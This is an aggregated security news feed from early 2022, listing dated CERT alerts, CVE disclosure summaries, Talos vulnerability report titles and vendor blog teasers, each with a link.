Security Alert (A22-02-01): Multiple Vulnerabilities in Android
2022-02-08T04:00:00Z | 1644292800

Google has released Android Security Bulletin February 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-22817
2022-02-08T00:00:00Z | 1644278400

CWE-276: Incorrect Default Permissions The vulnerability could allow unauthorized access to the base installation directory leading to local privilege escalation.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22817
SMA1000 SNMP Null pointer exception bug in Net-SNMP vendor packet resulting in SNMP DoS
2022-02-07T18:09:11Z | 1644257351

A Null pointer exception bug in Net-SNMP vendor (5.9.0 and earlier) packet allows a remote authenticated attacker to cause SMA1000 SNMP Denial of Service (DoS) by an insufficient check of null pointer. CVE: N/A Last updated: Feb. 7, 2022, 6:09 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0029
If Only Kodak and Nokia Resellers Had Known
2022-02-07T10:29:32Z | 1644229772

A short story that doesn’t have to be yours Prologue You’re the captain of a massive container ship filled with servers, hard drives, and mounting racks, making its way through stormy waters. The heavy cargo makes it hard for the ship to float and for you to navigate it safely to its destination. Suddenly, you... The post If Only Kodak and Nokia Resellers Had Known appeared first on Cato Networks.

https://www.catonetworks.com/blog/if-only-kodak-and-nokia-resellers-had-known/
Media Literacy Week offers activities for all ages
2022-02-07T09:06:07Z | 1644224767

The Media Literacy Week will be celebrated 7–13 February 2022. You can take part from the comfort of your home – follow the activities and share your tips with the hashtag #mediataitoviikko.

https://www.kyberturvallisuuskeskus.fi/en/news/media-literacy-week-offers-activities-all-ages
Media Literacy Week offers activities for all ages
2022-02-07T09:06:07Z | 1644224767

The Media Literacy Week will be celebrated 7–13 February 2022. You can take part from the comfort of your home – follow the activities and share your tips with the hashtag #mediataitoviikko.

https://www.kyberturvallisuuskeskus.fi/en/news/media-literacy-week-offers-activities-all-ages
NCSC-FI introduces new forms
2022-02-07T07:43:42Z | 1644219822

The National Cyber Security Centre Finland (NCSC-FI) has revamped its forms for reporting information security breaches and vulnerabilities. The new forms will be taken in use on 7 February 2022.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-introduces-new-forms
NCSC-FI introduces new forms
2022-02-07T07:43:42Z | 1644219822

The National Cyber Security Centre Finland (NCSC-FI) has revamped its forms for reporting information security breaches and vulnerabilities. The new forms will be taken in use on 7 February 2022.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-introduces-new-forms
Cyberattacks on oil and chemical sector
2022-02-04T15:47:00Z | 1643989620

The past few days, cyberattacks aimed at oil and chemicals storage facilities have been carried out in The Netherlands, Belgium and Germany.

https://english.ncsc.nl/latest/news/2022/februari/4/oil-and-chemical-sector
High Threat Security Alert (A22-01-23): Multiple Vulnerabilities in Samba
2022-02-04T04:00:00Z | 1643947200

Samba released security updates to address multiple vulnerabilities in Samba.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-01-24): Multiple Vulnerabilities in Cisco Products
2022-02-04T04:00:00Z | 1643947200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-25): Multiple Vulnerabilities in Google Chrome
2022-02-04T04:00:00Z | 1643947200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-26): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-02-04T04:00:00Z | 1643947200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Lançada Campanha de Sensibilização Violência no Namoro Online #logoutaoabuso
2022-02-04T00:00:00Z | 1643932800

No âmbito das atividades do mês da Internet Segura, a campanha “Violência no Namoro Online”, desenvolvida pelo Centro Internet Segura - CIS, vem alertar para determinados comportamentos nocivos no namoro decorrentes de uma utilização das plataformas digitais onde a empatia dá lugar à violência. O objetivo desta iniciativa passa por provocar a reflexão e eliminar práticas limitadoras e agressivas, optando por comportamentos conscientes, responsáveis e saudáveis. A violência no namoro existe e é um fenómeno cada vez mais recorrente nos meios digitais. A segurança na Internet é também segurança emocional. De forma a garantir que todos podem aceder a informação sobre os possíveis riscos online, o CIS aposta na prevenção sobre os comportamentos de controlo e assédio no namoro. Com o apoio da Comissão para a Cidadania e a Igualdade de Género – CIG, Continente e Metropolitano de Lisboa, a campanha de sensibilização #logoutaoabuso será disseminada através das redes sociais já a partir hoje, dia 4 de fevereiro. Igualmente, estará disponível nas lojas Continente, Continente Bom Dia, Continente Modelo e também nas carruagens do Metropolitano de Lisboa. Pode encontrar mais informação aqui.Para obter apoio para situações de violência no namoro online junto da Linha Internet Segura utilize o número gratuito 800 21 90 90 - disponível das 8h00 às 22h00, o email linhainternetsegura@apav.pt ou o formulário Pedir Esclarecimento.

https://dyn.cncs.gov.pt/pt/detalhe/art/135617/lancada-campanha-de-sensibilizacao-violencia-no-namoro-online-logoutaoabuso
How Schema-First approach creates better API, reduces boilerplate and eliminates human error
2022-02-03T08:50:56Z | 1643878256

In the server team at Cato Networks, we are responsible for building the web console for network and security configuration. Cato Networks is currently experiencing rapid growth in which bigger customers require control over the Cato API and the old solutions, that were built quickly can no longer stand the scale. Obviously, in tandem the... The post How Schema-First approach creates better API, reduces boilerplate and eliminates human error appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-schema-first-approach-creates-better-api-reduces-boilerplate-and-eliminates-human-error/
FIRST POST: January-March 2022
2022-02-03T00:00:00Z | 1643846400

Three new Special Interest Groups created by FIRST members; FIRST partcipates in several important UN actvites; 19 events organized in 2021 - registraton opens for FIRST Annual Conference in 2022; Twelve more member teams join FIRST

https://www.first.org/newsroom/newsletters/FIRST_POST_Jan-Mar2022.pdf
CVE-2022-21800
2022-02-03T00:00:00Z | 1643846400

USE OF A BROKEN OR RISKY CRYPTOGRAPHIC ALGORITHM CWE-327 The affected product uses the MD5 algorithm to hash the passwords before storing them but does not salt the hash. As a result, attackers may be able to crack the hashed passwords. Successful exploitation of these vulnerabilities could allow an attacker to gain user data (including organization details) and other sensitive data, compromise Mimosa's AWS (Amazon Web Services) cloud EC2 instance and S3 Buckets, and execute unauthorized remote code on all cloud-connected Mimosa devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-21800
CVE-2022-21215
2022-02-03T00:00:00Z | 1643846400

SERVER-SIDE REQUEST FORGERY (SSRF) CWE-918 This vulnerability could allow an attacker to force the server to create and execute a web request granting access to backend APIs that are only accessible to the Mimosa MMP server, or request pages that could perform some actions themselves. The attacker could force the server into accessing routes on those cloud-hosting platforms, accessing secret keys, changing configurations, etc. Successful exploitation of these vulnerabilities could allow an attacker to gain user data (including organization details) and other sensitive data, compromise Mimosa's AWS (Amazon Web Services) cloud EC2 instance and S3 Buckets, and execute unauthorized remote code on all cloud-connected Mimosa devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-21215
CVE-2022-21196
2022-02-03T00:00:00Z | 1643846400

IMPROPER AUTHORIZATION CWE-285 The affected product does not perform proper authorization and authentication checks on multiple API routes. An attacker may gain access to these API routes and achieve remote code execution, create a denial-of-service condition, and obtain sensitive information. Successful exploitation of these vulnerabilities could allow an attacker to gain user data (including organization details) and other sensitive data, compromise Mimosa's AWS (Amazon Web Services) cloud EC2 instance and S3 Buckets, and execute unauthorized remote code on all cloud-connected Mimosa devices. I

https://claroty.com/team82/disclosure-dashboard/cve-2022-21196
CVE-2022-21176
2022-02-03T00:00:00Z | 1643846400

IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') CWE-89 The affected product does not properly sanitize user input, which may allow an attacker to perform a SQL injection and obtain sensitive information. Successful exploitation of these vulnerabilities could allow an attacker to gain user data (including organization details) and other sensitive data, compromise Mimosa's AWS (Amazon Web Services) cloud EC2 instance and S3 Buckets, and execute unauthorized remote code on all cloud-connected Mimosa devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-21176
CVE-2022-21143
2022-02-03T00:00:00Z | 1643846400

IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') CWE-78 The affected product does not properly sanitize user input on several locations, which may allow an attacker to inject arbitrary commands. Successful exploitation of these vulnerabilities could allow an attacker to gain user data (including organization details) and other sensitive data, compromise Mimosa's AWS (Amazon Web Services) cloud EC2 instance and S3 Buckets, and execute unauthorized remote code on all cloud-connected Mimosa devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-21143
CVE-2022-21141
2022-02-03T00:00:00Z | 1643846400

INCORRECT AUTHORIZATION CWE-863 The affected product does not perform proper authorization checks on multiple API functions. An attacker may gain access to these functions and achieve remote code execution, create a denial-of-service condition, and obtain sensitive information. Successful exploitation of these vulnerabilities could allow an attacker to gain user data (including organization details) and other sensitive data, compromise Mimosa's AWS (Amazon Web Services) cloud EC2 instance and S3 Buckets, and execute unauthorized remote code on all cloud-connected Mimosa devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-21141
CVE-2022-0138
2022-02-03T00:00:00Z | 1643846400

DESERIALIZATION OF UNTRUSTED DATA CWE-502 The affected product has a deserialization function that does not validate or check the data, allowing arbitrary classes to be created. Successful exploitation of these vulnerabilities could allow an attacker to gain user data (including organization details) and other sensitive data, compromise Mimosa's AWS (Amazon Web Services) cloud EC2 instance and S3 Buckets, and execute unauthorized remote code on all cloud-connected Mimosa devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-0138
Platform or Portfolio? [Gartner® Report]
2022-02-02T15:35:33Z | 1643816133

The post Platform or Portfolio? [Gartner® Report] appeared first on Cato Networks.

https://www.catonetworks.com/resources/platform-or-portfolio-gartner-report/
Cato Resiliency: An Insider’s Look at Overcoming the Interxion Datacenter Outage
2022-02-02T08:35:48Z | 1643790948

The strength of any network is its resiliency—its ability to withstand disruptions that might otherwise cause a failure somewhere in the connectivity. The Cato Cloud service proved its resiliency during the massive hours-long service outage of the LON1 Interxion data center at its central London campus on January 10. Interxion suffered a catastrophic loss of... The post Cato Resiliency: An Insider’s Look at Overcoming the Interxion Datacenter Outage appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-resiliency-an-insiders-look-at-overcoming-the-interxion-datacenter-outage/
IT-minister: peame olema valmis, et Ukraina vastased küberründed jõuavad ka Eestisse
2022-02-02T07:00:00Z | 1643785200

Majandus- ja Kommunikatsiooniministeerium (MKM) ja Riigi Infosüsteemi Amet (RIA) saatsid nii riigiasutuste kui elutähtsat ja olulist teenust osutavate ettevõtete juhtidele küberturvalisuse alased soovitused seoses Ukraina vastaste küberrünnete ja nende võimaliku mõjuga Eestis.

https://ria.ee/uudised/it-minister-peame-olema-valmis-et-ukraina-vastased-kuberrunded-jouavad-ka-eestisse
Part 2: Improving crypto code in Rust using LLVM’s optnone
2022-02-01T12:00:25Z | 1643716825

Let’s implement crypto! Welcome to the second part of our posts on the challenges of implementing constant-time Rust code. Part 1 discussed challenges with constant-time implementations in Rust and WebAssembly and how optimization barriers can mitigate risk. The Rust crypto community has responded with several approaches, and in this post, we will […]

https://blog.trailofbits.com/2022/02/01/part-2-rusty-crypto/
Sealevel Systems, Inc. SeaConnect 370W OTA update task file overwrite vulnerability
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1395
Eclipse Foundation Paho MQTTClient-C library readPacket out-of-bounds write vulnerability
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1406
Sealevel Systems, Inc. SeaConnect 370W OTA update task out-of-bounds write vulnerability
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1394
Sealevel Systems, Inc. SeaConnect 370W URL_decode out-of-bounds write vulnerability
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1397
Sealevel Systems, Inc. SeaConnect 370W OTA Update "u-download" heap-based buffer overflow vulnerability
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1390
Sealevel Systems, Inc. SeaConnect 370W Web Server information disclosure vulnerability
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1391
Sealevel Systems, Inc. SeaConnect 370W Modbus/SeaMAX Remote Configuration denial of service vulnerabilities
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1392
Sealevel Systems, Inc. SeaConnect 370W MQTTS Certificate Validation vulnerability
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1388
Sealevel Systems, Inc. SeaConnect 370W LLMNR/NBNS stack-based buffer overflow vulnerabilities
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1389
Sealevel Systems, Inc. SeaConnect 370W HandleSeaCloudMessage out-of-bounds write vulnerabilities
2022-02-01T00:00:00Z | 1643673600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1396
What?s New for Developers: January 2022
2022-01-31T14:00:00Z | 1643637600

Hello, and welcome to our very first Developer Community update of 2022. In this new monthly series, we?ll share highlights of what is happening across the Akamai Developer Community. Since this is the first blog we?re posting, we will also catch up on news from October 2021 through today.

https://www.akamai.com/blog/developers/whats-new-for-developers-january-2022
Here’s Why You Don’t Have a CASB Yet
2022-01-31T13:47:49Z | 1643636869

There’s An App for That What used to be a catchphrase in the world of smartphones, “There’s an app for that”, has become a reality for enterprise applications as well. Cloud-based Software as a Service (SaaS) applications are available to cater for nearly every aspect of an organization’s needs. Whichever task an enterprise is looking... The post Here’s Why You Don’t Have a CASB Yet appeared first on Cato Networks.

https://www.catonetworks.com/blog/heres-why-you-dont-have-a-casb-yet/
Foxit Reader deletePages use-after-free vulnerability
2022-01-31T00:00:00Z | 1643587200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1429
Gerbv RS-274X aperture definition tokenization use-after-free vulnerability
2022-01-31T00:00:00Z | 1643587200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1415
Gerbv pick-and-place rotation parsing use of uninitialized variable vulnerability
2022-01-31T00:00:00Z | 1643587200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1417
Foxit Reader getPageNthWordQuads mishandled exception vulnerability
2022-01-31T00:00:00Z | 1643587200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1439
UK organisations encouraged to take action in response to current situation in and around Ukraine
2022-01-28T09:39:06Z | 1643362746

NCSC urge UK organisations to bolster their cyber security resilience in response to the malicious cyber incidents in and around Ukraine.

https://www.ncsc.gov.uk/news/uk-organisations-encouraged-to-take-action-around-ukraine-situation
ID-kaart sai 20-aastaseks
2022-01-28T07:00:00Z | 1643353200

„ID-kaardi tulekuga 2002. aastal algas Eestis uus ajastu. Meie tänane e-riik tugineb ID-kaardile ning selle kiibile ehitatud süsteemile. Oleme hoidnud kokku lugematu arv tunde selle arvelt, et saame täna teha kõik enda igapäevased toimingud ja tehingud, alates tulude deklareerimisest, e-hääletamisest kuni kinnisvara ostuni välja, kodust lahkumata,“ ütles RIA elektroonilise identiteedi osakonna äriarhitekt Mark Erlich.

https://ria.ee/uudised/id-kaart-sai-20-aastaseks
Universal Plug and Play (UPnP): What You Need to Know
2022-01-27T20:00:00Z | 1643313600

Universal Plug and Play (UPnP) is a widely used protocol with a decade-long history of flawed implementations across a wide range of consumer devices. In this paper, we will cover how these aws are still present on devices, how these vulnerabilities are actively being abused, and how a feature/vulnerability set that seems to be mostly forgotten could lead to continued problems in the future with DDoS, account takeover, and malware distribution.

https://www.akamai.com/blog/security/universal-plug-and-play-upnp-what-you-need-to-know
UPnProxy: Eternal Silence
2022-01-27T19:30:00Z | 1643311800

UPnProxy is alive and well. There are 277,000 devices, out of a pool of 3.5 million, running vulnerable implementations of UPnP. Of those, Akamai can confirm that more than 45,000 have been compromised in a widely distributed UPnP NAT injection campaign.

https://www.akamai.com/blog/security/upnproxy-eternal-silence
Cato CASB overview
2022-01-27T14:35:26Z | 1643294126

The post Cato CASB overview appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-casb-overview/
Moving Beyond Remote Access VPNs
2022-01-27T11:18:45Z | 1643282325

The COVID-19 pandemic drove rapid, widespread adoption of remote work. Just a few years ago, many organizations considered remote work inefficient or completely impossible for their industry and business. With the pandemic, remote work was proven to not only work but work well. However, this rapid shift to remote work left little time to redesign... The post Moving Beyond Remote Access VPNs appeared first on Cato Networks.

https://www.catonetworks.com/blog/moving-beyond-remote-access-vpns/
Facebook credential phishing via Facebook Messenger
2022-01-27T09:01:06Z | 1643274066

Facebook Messenger is being actively used for phishing Facebook user credentials. In the attempts, a hacked account is used to send messages with the aim of obtaining the recipients' telephone numbers and two-factor authentication codes to hijack their Facebook accounts. The best way to protect yourself from this scam is to be wary of Facebook messages from all senders, including people you know.

https://www.kyberturvallisuuskeskus.fi/en/ttn_20012022
Facebook credential phishing via Facebook Messenger
2022-01-27T09:01:06Z | 1643274066

Facebook Messenger is being actively used for phishing Facebook user credentials. In the attempts, a hacked account is used to send messages with the aim of obtaining the recipients' telephone numbers and two-factor authentication codes to hijack their Facebook accounts. The best way to protect yourself from this scam is to be wary of Facebook messages from all senders, including people you know.

https://www.kyberturvallisuuskeskus.fi/en/ttn_20012022
Alert concerning the Android malware FluBot removed
2022-01-27T08:55:30Z | 1643273730

The FluBot malware epidemic has been suppressed for now. The filtering measures taken by Finnish telecommunications operators and the NCSC-FI at Traficom have stopped FluBot infections from spreading in Android mobile phones. However, the infrastructure used by the malware is still online. The authorities and telecommunications operators are prepared for another active campaign, but there is currently no need for an alert.

https://www.kyberturvallisuuskeskus.fi/en/news/alert-concerning-android-malware-flubot-removed
Alert concerning the Android malware FluBot removed
2022-01-27T08:55:30Z | 1643273730

The FluBot malware epidemic has been suppressed for now. The filtering measures taken by Finnish telecommunications operators and the NCSC-FI at Traficom have stopped FluBot infections from spreading in Android mobile phones. However, the infrastructure used by the malware is still online. The authorities and telecommunications operators are prepared for another active campaign, but there is currently no need for an alert.

https://www.kyberturvallisuuskeskus.fi/en/news/alert-concerning-android-malware-flubot-removed
High Threat Security Alert (A22-01-20): Vulnerability in Linux Operating Systems
2022-01-27T04:00:00Z | 1643256000

A vulnerability was found in a Linux system service called polkit which is installed by default in several Linux distributions.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-01-21): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-01-27T04:00:00Z | 1643256000

Apple has released iOS 15.3 and iPadOS 15.3 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-22): Vulnerability in Apache Tomcat
2022-01-27T04:00:00Z | 1643256000

Apache Software Foundation has released a security advisory to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Google Chrome MediaStreamTrackGenerator use after free vulnerability
2022-01-27T00:00:00Z | 1643241600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1398
Part 1: The life of an optimization barrier
2022-01-26T12:00:35Z | 1643198435

Many engineers choose Rust as their language of choice for implementing cryptographic protocols because of its robust security guarantees. Although Rust makes safe cryptographic engineering easier, there are still some challenges to be aware of. Among them is the need to preserve constant-time properties, which ensure that, regardless of the input, code […]

https://blog.trailofbits.com/2022/01/26/part-1-the-life-of-an-optimization-barrier/
Combat Piracy with Akamai Managed Content Protection
2022-01-26T11:30:00Z | 1643196600

Learn how Akamai?s Managed Content Protection offering helps combat and mitigate the growing effects of online piracy for Akamai customers.

https://www.akamai.com/blog/security-research/combat-piracy-with-akamai-managed-content-protection
Ohuhinnang: Ukraina vastased küberründed ja võimalik mõju Eestis
2022-01-26T07:00:00Z | 1643180400

RIA analüüsi- ja ennetusosakond koostas ühes CERT-EEga ohuhinnangu, mis keskendub Ukraina vastastele küberrünnakutele ning selle võimalikule mõjule Eestis.

https://ria.ee/uudised/ohuhinnang-ukraina-vastased-kuberrunded-ja-voimalik-moju-eestis
Reolink RLC-410W netserver parse_command_list memory corruption vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1451
Reolink RLC-410W device network settings OS command injection vulnerabilities
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1424
Reolink RLC-410W cgiserver.cgi Login authentication bypass vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1420
Reolink RLC-410W cgiserver.cgi command parser denial of service vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1432
Reolink RLC-410W netserver recv_command denial of service vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1450
Reolink RLC-410W hardcoded TLS key information disclosure vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1448
Reolink RLC-410W cgiserver.cgi cgi_check_ability improper access control vulnerabilities
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1425
Reolink RLC-410W cgiserver.cgi JSON command parser denial of service vulnerabilities
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1421
Reolink RLC-410W cgiserver.cgi session creation denial of service vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1423
Reolink RLC-410W "factory" binary firmware update vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1428
Reolink RLC-410W cgiserver.cgi Upgrade API denial of service vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1422
Reolink RLC-410W web server misconfiguration information disclosure vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1446
Reolink RLC-410W device TestEmail out-of-bounds write vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1445
Reolink RLC-410W "update" firmware checks firmware update vulnerability
2022-01-26T00:00:00Z | 1643155200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1447
Deploying Zero Trust Network Access for Secure Application Access? Don?t Forget to Secure Your Employees
2022-01-25T14:00:00Z | 1643119200

Secure your workforce with the help of multi-factor authentication and Akamai's Zero Trust Network Access application in place of a virtual private network (VPN).

https://www.akamai.com/blog/security/deploying-zero-trust-network-access-for-secure-application-access-dont-forget-to-secure-your-employees
Cursos CERT.br: Inscrições 2022 Abertas
2022-01-25T13:00:00Z | 1643115600

Estão abertas as inscrições para as turmas 2022 dos cursos Fundamentals of Incident Handling (FIH) e Advanced Topics in Incident Handling (ATIH): https://cert.br/cursos/inscricao/ Valor: R$ 3.300,00 Local: Sede do NIC.br, São Paulo, SP As turmas oferecidas serão nas seguintes datas: Fundamentals of Incident Handling (FIH) Turma 1: 21 a 25 de março de 2022 Turma 2: 23 a 27 de maio de 2022 Turma 3: 25 a 29 de julho de 2022 Advanced Topics in Incident Handling (ATIH) Turma 1: 25 a 29 de abril de 2022 Turma 2: 26 a 30 de setembro de 2022 Turma 3: 17 a 21 de outubro de 2022

https://cert.br/cursos/inscricao/
Analysis of Phishing Kill Chain Identifies Emerging Technique That Exploits Trust in Your Collaboration Platforms
2022-01-25T08:00:33Z | 1643097633

Think of phishing and most people will think of cleverly crafted emails designed to get you to click on malicious links. But new research shows that increasingly attackers are turning to seemingly legitimate and implicitly trusted collaboration tools to penetrate enterprise defenses. Here’s what they’re doing and how you (or your security vendor) can detect... The post Analysis of Phishing Kill Chain Identifies Emerging Technique That Exploits Trust in Your Collaboration Platforms appeared first on Cato Networks.

https://www.catonetworks.com/blog/analysis-of-phishing-kill-chain-identifies-emerging-technique-that-exploits-trust-in-your-collaboration-platforms/
Apple macOS ImageIO DDS image out-of-bounds read vulnerability
2022-01-25T00:00:00Z | 1643068800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1414
CVE-2021-44477
2022-01-25T00:00:00Z | 1643068800

ToolBoxST prior to Version 7.8.0 uses a vulnerable version of the Ionic .NET Zip library that does not properly sanitize path names allowing files to be extracted to a location above their parent directory and back to the root directory. If an attacker compromises an HMI or creates their own SDI client, they can upload the device.zip file from a controller, patch it to contain a malicious file and path, and download it back to the controller. The next user to perform an upload could grab the malicious device.zip and extract it to their HMI, creating the potential for arbitrary write, overwrite, and execution. Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2021-44477
We think Cyber Essentials is, well, still essential ...
2022-01-24T09:12:12Z | 1643015532

...and that's why we are making some changes. Anne W summarises what they are, and explains the thinking behind them.

https://www.ncsc.gov.uk/blog-post/we-think-cyber-essentials-is-well-still-essential
High Threat Security Alert (A22-01-17): Vulnerability in Microsoft Windows
2022-01-24T04:00:00Z | 1642996800

Microsoft has released an out-of-band security update to address the vulnerability in the WinVerifyTrust function that handles Windows Authenticode signature verification for portable executable (PE) files.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-01-18): Multiple Vulnerabilities in McAfee Agent
2022-01-24T04:00:00Z | 1642996800

McAfee has released a security advisory to address multiple vulnerabilities in McAfee Agent for Windows.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-19): Vulnerability in SolarWinds Serv-U File Server
2022-01-24T04:00:00Z | 1642996800

SolarWinds has released a security advisory to address an improper input validation vulnerability (CVE-2021-35247) in Serv-U File Server.

https://www.govcert.gov.hk/en/alerts_detail.php
What to Expect when you’re Expecting SASE
2022-01-23T09:47:23Z | 1642931243

The post What to Expect when you’re Expecting SASE appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-104
2021 ended with a yellow and red cyber weather report in December
2022-01-21T11:14:16Z | 1642763656

In December, the cyber weather report turned red because we published a severe alert on the Log4shell vulnerability that is having a global impact. The number of FluBot observations fortunately decreased in December, but the yellow alert remained in force. At the end of the year, it was also time to update our statistics for 2021. Based on the figures, our cyber meteorologists have been – and will be – busy!

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_12/2021
2021 ended with a yellow and red cyber weather report in December
2022-01-21T11:14:16Z | 1642763656

In December, the cyber weather report turned red because we published a severe alert on the Log4shell vulnerability that is having a global impact. The number of FluBot observations fortunately decreased in December, but the yellow alert remained in force. At the end of the year, it was also time to update our statistics for 2021. Based on the figures, our cyber meteorologists have been – and will be – busy!

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_12/2021
Kaska ja Hendre: Ukraina küberründed ja mida sellest Eesti jaoks järeldada
2022-01-21T07:00:00Z | 1642748400

NATO Küberkaitsekoostöö Keskuse õigusosakonna juhataja Kadri Kaska ja RIA juhtivanalüütik Marju Hendre kirjutavad 13. jaanuari hilisõhtul Ukraina valitsuse veebilehti tabanud ulatuslikust küberrünnakust ning sellest, milliseid järeldusi võiks sellest teha oma küberruumi kaitseks Eesti.

https://ria.ee/uudised/kaska-ja-hendre-ukraina-kuberrunded-ja-mida-sellest-eesti-jaoks-jareldada
Security Alert (A22-01-16): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-01-21T04:00:00Z | 1642737600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
The Crypto Revolution Reaches Fever Pitch for Today?s Phishing Scammers
2022-01-20T15:00:00Z | 1642690800

Akamai threat researchers tracked continuous cyberattack and crypto-phishing campaigns that took advantage of cryptocurrency-based scams.

https://www.akamai.com/blog/security/the-crypto-revolution-reaches-fever-pitch-for-todays-phishing-scammers
Cato Demo: TLS Inspection in Minutes
2022-01-20T11:14:59Z | 1642677299

The post Cato Demo: TLS Inspection in Minutes appeared first on Cato Networks.

https://www.catonetworks.com/resources/tls-decryption-demo/
Trendid ja tähelepanekud küberruumis – IV kvartal 2021
2022-01-20T07:00:00Z | 1642662000

RIA loob iga kvartali kohta ülevaate, mis räägib perioodi tähtsamatest trendidest ja tähelepanekutest.

https://ria.ee/uudised/trendid-ja-tahelepanekud-kuberruumis-iv-kvartal-2021
Tulu deklareerimise eel kontrolli, kas dokumendid kehtivad ja PIN-koodid on olemas
2022-01-20T07:00:00Z | 1642662000

PPA, MTA ja RIA tuletavad meelde, et enne tulude deklareerimist tasub üle kontrollida enda dokumentide kehtivusaeg ja PIN-koodide olemasolu. Dokumentide ja PIN-koodide olemasolul võtab tuludeklaratsiooni esitamine veebis aega vaid mõned minutid.

https://ria.ee/uudised/tulu-deklareerimise-eel-kontrolli-kas-dokumendid-kehtivad-ja-pin-koodid-olemas
Security Alert (A22-01-13): Multiple Vulnerabilities in Google Chrome
2022-01-20T04:00:00Z | 1642651200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-14) Multiple Vulnerabilities in Drupal
2022-01-20T04:00:00Z | 1642651200

Drupal has released a security advisory to address multiple vulnerabilities in the jQuery UI library.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-01-15): Multiple Vulnerabilities in Cisco Products
2022-01-20T04:00:00Z | 1642651200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-22289
2022-01-20T00:00:00Z | 1642636800

